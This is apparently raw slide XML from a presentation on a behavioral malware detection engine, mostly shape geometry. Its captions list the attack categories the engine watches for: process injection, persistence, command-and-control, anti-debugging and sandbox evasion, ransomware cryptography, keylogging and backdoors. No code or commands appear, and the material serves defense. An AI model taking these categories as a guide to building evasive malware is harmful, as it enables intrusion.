                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="164460" y="212154"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="196684" y="205627"/>
                  <a:pt x="222073" y="180238"/>
                  <a:pt x="228600" y="148014"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="222022" y="148014"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="212925" y="148014"/>
                  <a:pt x="205576" y="140665"/>
                  <a:pt x="205576" y="131568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205576" y="122472"/>
                  <a:pt x="212925" y="115122"/>
                  <a:pt x="222022" y="115122"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="228600" y="115122"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="222073" y="82898"/>
                  <a:pt x="196684" y="57510"/>
                  <a:pt x="164460" y="50983"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="164460" y="57561"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="164460" y="66658"/>
                  <a:pt x="157111" y="74007"/>
                  <a:pt x="148014" y="74007"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138918" y="74007"/>
                  <a:pt x="131568" y="66658"/>
                  <a:pt x="131568" y="57561"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="131568" y="50983"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="99344" y="57510"/>
                  <a:pt x="73956" y="82898"/>
                  <a:pt x="67429" y="115122"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="74007" y="115122"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="83104" y="115122"/>
                  <a:pt x="90453" y="122472"/>
                  <a:pt x="90453" y="131568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90453" y="140665"/>
                  <a:pt x="83104" y="148014"/>
                  <a:pt x="74007" y="148014"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="67429" y="148014"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="148014" y="106899"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="161630" y="106899"/>
                  <a:pt x="172683" y="117953"/>
                  <a:pt x="172683" y="131568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="172683" y="145184"/>
                  <a:pt x="161630" y="156237"/>
                  <a:pt x="148014" y="156237"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="134399" y="156237"/>
                  <a:pt x="123345" y="145184"/>
                  <a:pt x="123345" y="131568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123345" y="117953"/>
                  <a:pt x="134399" y="106899"/>
                  <a:pt x="148014" y="106899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00050" y="381000"/>
            <a:ext cx="1962150" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1962150" h="381000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1962150" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196215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Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="381000"/>
            <a:ext cx="38100" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="38100" h="381000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381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" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="487680"/>
            <a:ext cx="1714500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120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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Architecture Map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381000" y="914400"/>
            <a:ext cx="1171575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Architecture Overview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00050" y="1790700"/>
            <a:ext cx="5581650" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5581650" h="1143000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5581650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558165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400050" y="1790700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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1981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8098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="419102" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440143" y="0"/>
                  <a:pt x="457200" y="17057"/>
                  <a:pt x="457200" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="419102"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="440143"/>
                  <a:pt x="440143" y="457200"/>
                  <a:pt x="41910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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552450" y="1981200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219200" y="2076450"/>
            <a:ext cx="3581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Process Injection &amp; Memory Manipulation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09600" y="2514600"/>
            <a:ext cx="5257800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="60960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Cross-process memory operations and code injection techniques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00050" y="3086100"/>
            <a:ext cx="5581650" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5581650" h="1143000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5581650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558165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Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="3086100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Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3276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8098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="419102" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440143" y="0"/>
                  <a:pt x="457200" y="17057"/>
                  <a:pt x="457200" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="419102"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="440143"/>
                  <a:pt x="440143" y="457200"/>
                  <a:pt x="41910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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552450" y="3276600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219200" y="3371850"/>
            <a:ext cx="2190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Persistence Mechanisms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609600" y="3810000"/>
            <a:ext cx="5257800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="60960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Registry, service, and scheduled task persistence methods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0050" y="4381500"/>
            <a:ext cx="5581650" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5581650" h="1143000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5581650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558165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Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4381500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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4572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8098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="419102" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440143" y="0"/>
                  <a:pt x="457200" y="17057"/>
                  <a:pt x="457200" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="419102"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="440143"/>
                  <a:pt x="440143" y="457200"/>
                  <a:pt x="41910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Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552450" y="4572000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03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219200" y="4667250"/>
            <a:ext cx="1781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Network Operations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09600" y="5105400"/>
            <a:ext cx="5257800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="60960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Command-and-control communication patterns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00050" y="5676900"/>
            <a:ext cx="5581650" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5581650" h="1143000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5581650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558165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Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="5676900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6" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="586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8098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="419102" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440143" y="0"/>
                  <a:pt x="457200" y="17057"/>
                  <a:pt x="457200" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="419102"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="440143"/>
                  <a:pt x="440143" y="457200"/>
                  <a:pt x="41910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7" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552450" y="5867400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04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219200" y="5962650"/>
            <a:ext cx="23526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Anti-Detection Techniques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09600" y="6400800"/>
            <a:ext cx="5257800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="60960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Anti-debugging, anti-VM, and sandbox evasion methods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6229350" y="1790700"/>
            <a:ext cx="5581650" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5581650" h="1143000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5581650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558165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Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229350" y="1790700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Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438900" y="1981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8098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="419102" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440143" y="0"/>
                  <a:pt x="457200" y="17057"/>
                  <a:pt x="457200" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="419102"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="440143"/>
                  <a:pt x="440143" y="457200"/>
                  <a:pt x="41910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Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381750" y="1981200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05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7048500" y="2076450"/>
            <a:ext cx="2266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Cryptographic Operations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438900" y="2514600"/>
            <a:ext cx="5257800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="60960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Encryption/decryption patterns for ransomware and C2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229350" y="3086100"/>
            <a:ext cx="5581650" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5581650" h="1143000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5581650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558165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7" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229350" y="3086100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8" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438900" y="32766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8098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="419102" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440143" y="0"/>
                  <a:pt x="457200" y="17057"/>
                  <a:pt x="457200" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="419102"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="440143"/>
                  <a:pt x="440143" y="457200"/>
                  <a:pt x="41910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9" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381750" y="3276600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06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048500" y="3371850"/>
            <a:ext cx="2000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Theft Capabilities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38900" y="3810000"/>
            <a:ext cx="5257800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="60960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Keylogging and screen capture operations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229350" y="4381500"/>
            <a:ext cx="5581650" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5581650" h="1143000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5581650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558165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3" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229350" y="4381500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4" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438900" y="45720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8098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="419102" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440143" y="0"/>
                  <a:pt x="457200" y="17057"/>
                  <a:pt x="457200" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="419102"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="440143"/>
                  <a:pt x="440143" y="457200"/>
                  <a:pt x="41910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5" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381750" y="4572000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07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048500" y="4667250"/>
            <a:ext cx="18573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Backdoor Operations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438900" y="5105400"/>
            <a:ext cx="5257800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="60960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Remote access and command shell execution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229350" y="5676900"/>
            <a:ext cx="5581650" cy="1143000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5581650" h="1143000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5581650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558165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9" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229350" y="5676900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0" y="1143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0" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438900" y="586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38098" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="419102" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440143" y="0"/>
                  <a:pt x="457200" y="17057"/>
                  <a:pt x="457200" y="38098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="419102"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="440143"/>
                  <a:pt x="440143" y="457200"/>
                  <a:pt x="419102" y="457200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38098" y="457200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17057" y="457200"/>
                  <a:pt x="0" y="440143"/>
                  <a:pt x="0" y="4191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1" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381750" y="5867400"/>
            <a:ext cx="5715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08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7048500" y="5962650"/>
            <a:ext cx="24098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Risk Calculation Framework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438900" y="6400800"/>
            <a:ext cx="5257800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="60960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Scoring algorithm and threat level mapping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1992" y="410390"/>
            <a:ext cx="68398" cy="547187"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="68398" h="547187">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="68398" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68398" y="547187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="547187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Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547187" y="341992"/>
            <a:ext cx="5685610" cy="205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7" b="1" kern="0" spc="108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Framework Overview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47187" y="615585"/>
            <a:ext cx="5822407" cy="4103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231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Behavioral Analysis Framework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9091" y="1299568"/>
            <a:ext cx="5634311" cy="1761257"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5634311" h="1761257">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5634311" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5634311" y="1761257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1761257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" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359091" y="1299568"/>
            <a:ext cx="34199" cy="1761257"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34199" h="1761257">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34199" y="1761257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1761257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547187" y="1470564"/>
            <a:ext cx="410390" cy="410390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="410390" h="410390">
                <a:moveTo>
                  <a:pt x="34198" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="376192" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="395079" y="0"/>
                  <a:pt x="410390" y="15311"/>
                  <a:pt x="410390" y="34198"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="410390" y="376192"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="410390" y="395079"/>
                  <a:pt x="395079" y="410390"/>
                  <a:pt x="376192" y="410390"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34198" y="410390"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15311" y="410390"/>
                  <a:pt x="0" y="395079"/>
                  <a:pt x="0" y="376192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="34198"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15324"/>
                  <a:pt x="15324" y="0"/>
                  <a:pt x="34198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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649784" y="1573161"/>
            <a:ext cx="205195" cy="205195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="205195" h="205195">
                <a:moveTo>
                  <a:pt x="179546" y="102597"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="179546" y="60129"/>
                  <a:pt x="145066" y="25649"/>
                  <a:pt x="102597" y="25649"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60129" y="25649"/>
                  <a:pt x="25649" y="60129"/>
                  <a:pt x="25649" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25649" y="145066"/>
                  <a:pt x="60129" y="179546"/>
                  <a:pt x="102597" y="179546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="145066" y="179546"/>
                  <a:pt x="179546" y="145066"/>
                  <a:pt x="179546" y="102597"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="102597"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="45972"/>
                  <a:pt x="45972" y="0"/>
                  <a:pt x="102597" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159223" y="0"/>
                  <a:pt x="205195" y="45972"/>
                  <a:pt x="205195" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205195" y="159223"/>
                  <a:pt x="159223" y="205195"/>
                  <a:pt x="102597" y="205195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45972" y="205195"/>
                  <a:pt x="0" y="159223"/>
                  <a:pt x="0" y="102597"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="102597" y="134659"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="120293" y="134659"/>
                  <a:pt x="134659" y="120293"/>
                  <a:pt x="134659" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="134659" y="84902"/>
                  <a:pt x="120293" y="70536"/>
                  <a:pt x="102597" y="70536"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84902" y="70536"/>
                  <a:pt x="70536" y="84902"/>
                  <a:pt x="70536" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70536" y="120293"/>
                  <a:pt x="84902" y="134659"/>
                  <a:pt x="102597" y="134659"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="102597" y="44886"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="134449" y="44886"/>
                  <a:pt x="160309" y="70746"/>
                  <a:pt x="160309" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160309" y="134449"/>
                  <a:pt x="134449" y="160309"/>
                  <a:pt x="102597" y="160309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70746" y="160309"/>
                  <a:pt x="44886" y="134449"/>
                  <a:pt x="44886" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44886" y="70746"/>
                  <a:pt x="70746" y="44886"/>
                  <a:pt x="102597" y="44886"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="89773" y="102597"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="89773" y="95519"/>
                  <a:pt x="95519" y="89773"/>
                  <a:pt x="102597" y="89773"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109676" y="89773"/>
                  <a:pt x="115422" y="95519"/>
                  <a:pt x="115422" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115422" y="109676"/>
                  <a:pt x="109676" y="115422"/>
                  <a:pt x="102597" y="115422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95519" y="115422"/>
                  <a:pt x="89773" y="109676"/>
                  <a:pt x="89773" y="102597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Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094373" y="1470564"/>
            <a:ext cx="4813532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Mission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094373" y="1778356"/>
            <a:ext cx="4796432" cy="11114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7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Behavioral Analysis Engine provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1077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proactive threat detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1077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by monitoring system calls, API invocations, and process behaviors. Unlike signature-based systems that require prior knowledge of threats, our engine identifies malicious patterns through behavioral analysis, enabling detection of zero-day attacks and advanced persistent threats.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59091" y="3197621"/>
            <a:ext cx="5634311" cy="1538962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5634311" h="1538962">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5634311" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5634311" y="1538962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1538962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Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359091" y="3197621"/>
            <a:ext cx="34199" cy="1538962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34199" h="1538962">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34199" y="1538962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1538962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Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547187" y="3368617"/>
            <a:ext cx="410390" cy="410390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="410390" h="410390">
                <a:moveTo>
                  <a:pt x="34198" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="376192" y="0"/>
